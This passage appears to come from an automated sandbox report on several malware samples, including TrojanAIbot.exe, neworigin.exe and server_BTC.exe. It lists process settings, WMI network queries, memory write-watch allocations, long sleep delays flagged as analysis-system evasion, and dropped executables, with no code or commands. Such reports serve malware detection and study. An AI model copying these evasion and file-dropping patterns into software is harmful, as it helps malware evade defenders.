                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2A60000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 15E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2F60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2DA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 29A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2B60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 29E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 13D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2E50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2D80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2790000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 29D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2800000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: E30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2BA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: FA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2AF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2CE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 4CE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2B70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2CF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 4CF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: C40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2920000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2660000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 4789Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 1465Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5984
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 5176
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 4614
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 965
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 365
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 4860
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 4961
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeDropped PE file which has not been started: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFAPI coverage: 9.7 %
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6620Thread sleep count: 4789 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -99841s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -99682s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -99522s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -99392s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -99248s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -99105s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -98983s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -98860s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -98743s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -98632s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -98515s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -98407s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -98288s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -98147s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -98030s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -97920s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -97811s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -97661s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -97403s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -97231s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -97104s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -96987s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -96862s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -96734s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -96622s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -96511s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -96406s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6620Thread sleep count: 1465 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -96299s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -96174s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -96049s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -95924s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -95799s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -99953s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -99844s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -99732s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -99612s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -99484s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -99344s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -98867s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -98607s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -98469s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -98340s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -98233s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -98072s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -97945s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -97834s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -97708s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -97580s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -97451s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -97291s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -97087s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -96940s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -96797s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208Thread sleep time: -96016s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 1576Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676Thread sleep count: 5984 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7224Thread sleep time: -310560000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7224Thread sleep time: -276840000s >= -30000s
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 6420Thread sleep count: 36 > 30
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7364Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7796Thread sleep count: 965 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -99861s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -99718s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -99592s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7796Thread sleep count: 365 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -99351s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -99106s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -98670s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -98540s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -98356s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -98203s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -98081s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -97957s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -97829s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -97519s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -97350s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -97175s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -96957s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -96795s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792Thread sleep time: -96550s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 7640Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -30437127721620741s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -99792s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -99641s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -99504s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -99391s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -99279s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -99167s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -99055s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -98943s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -98828s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -98692s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -98578s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -98253s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -98106s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97956s >= -30000s
